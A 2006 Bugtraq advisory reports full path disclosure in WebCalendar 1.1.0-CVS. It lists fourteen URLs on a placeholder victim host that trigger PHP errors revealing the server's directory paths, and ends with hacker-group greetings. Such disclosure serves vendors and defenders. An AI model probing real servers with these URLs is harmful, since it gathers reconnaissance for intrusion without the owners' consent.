Full path disclosure in Webcalendar 1.1.0-CVS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Full path disclosure in Webcalendar 1.1.0-CVS
From: crasher@xxxxxxxxxxxx
Date: Wed, 29 Mar 2006 13:58:55 +0700
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Internet Messaging Program (IMP) H3 (4.0.3)

Full path disclosure in webcalendar

Author   : Rusydi Hasan M
a.k.a    : cR45H3R
Location : Indonesia, Cilacap
Date     : March,28th 2006
Version  : 1.1.0-CVS

--- (software description)

WebCalendar is a PHP application used to maintain a
calendar for one or more persons and for a variety of purposes.


--- (vulnerable)

an attacker can get the location of the root directory from
error message


--- (PoC)

1. in directory /includes/index.php

   http://[victim]/[webcal_dir]/includes

   Parse error: parse error, unexpected T_STRING in
   /var/www/html/webcalendar/includes/index.php on line 1

2  in directory /tests/add_duration_test.php and /tests/all_tests.php

   http://[victim]/[webcal_dir]/tests/add_duration_test.php

   Fatal error: Class testoffunctions: Cannot inherit from undefined class
unittestcase in
   /var/www/html/webcalendar/tests/add_duration_test.php on line 4

   http://[victim]/[webcal_dir]/tests/all_tests.php

   Warning: main(../../simpletest/unit_tester.php): failed to open stream: No
such file or
   directory in /var/www/html/webcalendar/tests/all_tests.php on line 6

   Fatal error: main(): Failed opening required
'../../simpletest/unit_tester.php'
   (include_path='.:/usr/lib/php/:/usr/share/pear/') in
    /var/www/html/webcalendar/tests/all_tests.php on line 6

3   in groups.php

   http://[victim]/[webcal_dir]/groups.php

   Fatal error: Call to undefined function: translate() in
/var/www/html/webcalendar/groups.php
   on line 5

4   in nonusers.php

   http://[victim]/[webcal_dir]/nonusers.php

   Fatal error: Call to undefined function: translate() in
   /var/www/html/webcalendar/nonusers.php on line 3

5   in /includes/settings.php

   http://[victim]/[webcal_dir]/includes/settings.php

   Parse error: parse error, unexpected ':' in
/var/www/html/webcalendar/includes/settings.php
   on line 3

6   in /includes/init.php

   http://[victim]/[webcal_dir]/includes/init.php

   Warning: main(includes/classes/WebCalendar.class): failed to open stream: No
such file or
   directory in /var/www/html/webcalendar/includes/init.php on line 46

   Fatal error: main(): Failed opening required
'includes/classes/WebCalendar.class'
   (include_path='.:/usr/lib/php/:/usr/share/pear/') in
   /var/www/html/webcalendar/includes/init.php on line 46

7   in /includes/settings.php.orig

   http://[victim]/[webcal_dir]/includes/settings.php.orig

   Parse error: parse error, unexpected ':' in
   /var/www/html/webcalendar/includes/settings.php.orig on line 21

8  in /includes/js/admin.php

   http://[victim]/[webcal_dir]/includes/js/admin.php

   Fatal error: Call to undefined function: etranslate() in
   /var/www/html/webcalendar/includes/js/admin.php on line 14

9  in /includes/js/edit_entry.php

   http://[victim]/[webcal_dir]/includes/js/edit_entry.php

   Fatal error: Call to undefined function: etranslate() in
   /var/www/html/webcalendar/includes/js/edit_entry.php on line 15

10 in /includes/js/edit_layer.php

   http://[victim]/[webcal_dir]/includes/js/edit_layer.php

   Fatal error: Call to undefined function: etranslate() in
   /var/www/html/webcalendar/includes/js/edit_layer.php on line 24

11 in /includes/js/export_import.php

   http://[victim]/[webcal_dir]/includes/js/export_import.php

   Fatal error: Call to undefined function: etranslate() in
   /var/www/html/webcalendar/includes/js/export_import.php on line 68

12 in /includes/js/popups.php

   http://[victim]/[webcal_dir]/includes/js/popups.php

   // You can copy/modify and distribute this code under the conditions // of
the GNU GENERAL
   PUBLIC LICENSE Version 2. // var ns4 // Are we using Netscape4? var ie4 //
Are we using
   Internet Explorer Version 4? var ie5 // Are we using Internet Explorer
Version 5 and up? var
   kon // Are we using KDE Konqueror? var x,y,winW,winH // Current help position
and main
   window size var idiv=null // Pointer to infodiv container var px="px" //
position suffix
   with "px" in some cases var popupW // width of popup var popupH // height of
popup var
   xoffset = 8 // popup distance from cursor x coordinate var yoffset = 12 //
popup distance
   from cursor y coordinate var followMe = 1 // allow popup to follow
cursor...turn off for
   better performance var maxwidth = 300 // maximum width of popup window
function
   nsfix(){setTimeout("window.onresize = rebrowse", 2000);} function
   rebrowse(){window.location.reload();} function infoinit(){
ns4=(document.layers)?true:false,
   ie4=(document.all)?true:false;
ie5=((ie4)&&((navigator.userAgent.indexOf('MSIE
   5')>0)||(navigator.userAgent.indexOf('MSIE 6')>0)))?true:false;
   kon=(navigator.userAgent.indexOf('konqueror')>0)?true:false;
x=0;y=0;winW=800;winH=600;
   idiv=null; if (followMe) { document.onmousemove = mousemove;
if(ns4&&document.captureEvents)
   document.captureEvents(Event.MOUSEMOVE); } // Workaround for just another
netscape bug: Fix
   browser confusion on resize // obviously conqueror has a similar problem :-(
if(ns4||kon){
   nsfix() } if(ns4) { px=""; } var entries =
document.getElementsBySelector("a.entry");
   entries = entries.concat(document.getElementsBySelector("a.layerentry"));
entries =
   entries.concat(document.getElementsBySelector("a.unapprovedentry")); for (var
i = 0; i <
   entries.length; i++) { entries[i].onmouseover = function(event) { show(event,
"eventinfo-" +
   this.id); window.status = "
   Fatal error: Call to undefined function: etranslate() in
   /var/www/html/webcalendar/includes/js/popups.php on line 57
                       ^
                       ^
                       |---------- the directory

13 in /includes/js/pref.php

   http://[victim]/[webcal_dir]/includes/js/pref.php

   0 ) colorErr = true; if ( ! validWorkHours ( form ) ) { err += "
   Fatal error: Call to undefined function: etranslate() in
   /var/www/html/webcalendar/includes/js/pref.php on line 29

14 in /includes/menu/index.php

   http://[victim]/[webcal_dir]/includes/menu

   Fatal error: Call to undefined function: access_is_enabled() in
   /var/www/html/webcalendar/includes/menu/index.php on line 24


--- (shoutz)

#k-elektronik
(fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,etc)
#e-c-h-o (y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32,
anonymous, the day)
Ph03n1x,ghoz,r34d3r,spyoff,slackX,sakitjiwa,xnuxer
k-elektronik@xxxxxxxxxxxxxxxx
newbie_hacker@xxxxxxxxxxxxxxx
jasakom-perjuangan@xxxxxxxxxxxxxxx

--- (special)

danurdara prama for the bandwidth B)
--- (contact)

 cR45H3R || http://www.kecoak.or.id || crasher@xxxxxxxxxxxx

Prev by Date: Re: [Full-disclosure] Critical PHP bug - act ASAP if you are running web with sensitive data
Next by Date: [ GLSA 200603-26 ] bsd-games: Local privilege escalation in tetris-bsd
Previous by thread: Resource to Report and Stop Phishing Scams
Next by thread: [ GLSA 200603-26 ] bsd-games: Local privilege escalation in tetris-bsd
Index(es):
- Date
- Thread